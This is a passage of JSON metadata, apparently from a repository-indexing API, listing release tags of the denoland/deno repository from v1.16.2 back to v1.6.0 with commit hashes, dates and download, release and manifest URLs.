00Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-